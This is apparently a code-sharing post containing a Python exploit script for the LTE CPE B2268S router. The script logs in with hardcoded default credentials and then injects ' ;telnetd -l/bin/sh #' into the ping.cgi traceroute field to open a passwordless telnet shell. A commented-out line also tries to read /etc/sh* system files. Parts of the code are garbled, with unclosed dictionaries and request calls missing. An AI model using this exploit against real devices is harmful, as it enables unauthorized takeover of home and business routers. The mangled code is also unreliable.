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Last active November 19, 2023 09:45
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LTE CPE B2268S Router Command Injection to Shell Spawn
#!/usr/bin/env python3
# LTE CPE B2268S Router
# version: V100R001C35SP100B529
# Busybox Command Injection, vulnerability in the traceroute command
# Payload:
# data = {
# 'authToken': token, <= retrieved by get_token() method
# 'ping': '2', => traceroute
# 'IPaddress': ' ;telnetd -l/bin/sh #',
# } POST => ping.cgi
# the "telnetd -l/bin/sh" cmd opens a shell without loging in when connecting
# with telnet: telnet 23 => shell
# Spend most of time trying to shorten the payload as it seems to be truncated
# after x amount of characters.
# This corporate fuckery is insane, they sell you something you can't
# control, even the most basic stuff
# This is what helped the most:
import requests
import re
import base64
base = ''
login = 'login.cgi'
index = 'indexMain.cgi'
ping = 'ping.cgi'
user = 'User'
passwd = 'LTEcpe'
session = requests.session()
authToken = None
def get_token(page):
res = session.get(base + page, verify=False)
matches = re.findall('<input type="hidden" id="authToken" name="authToken" value="(.{64})"/>', res.text)
return matches[0]
def test_login():
#print('sending login data..')
encode_passwd = base64.b64encode(passwd.encode('utf-8'))
salt = authToken
salt_passwd = salt + encode_passwd.decode('utf-8')
encrypt_passwd = base64.b64encode(salt_passwd.encode('utf-8'))
# logining in
data = dict({
'authToken': authToken,
'UserName': 'User',
'password': encrypt_passwd,
'hiddenPassword': encrypt_passwd,
'submitValue': '1'
res = + login, data=data, verify=False)
# redirecting
data = dict({
'submitValue': '0'
res = + index, data=data, verify=False)
def test_ping(method, ip):
token = get_token(ping)
data = dict({
'authToken': token,
'ping': method,
'IPaddress': ip,
res = + ping, data=data, verify=False)
matches = re.findall('<textarea name="LineInfoDisplay" align="left" cols="100%" rows="15" readonly >([\s\S]*)</textarea>', res.text)
def main():
global authToken
authToken = get_token(login)
if authToken is not None:
#test_ping('2', ' ;cat /etc/sh* #')
test_ping('2', ' ;telnetd -l/bin/sh #')
if __name__ == "__main__":
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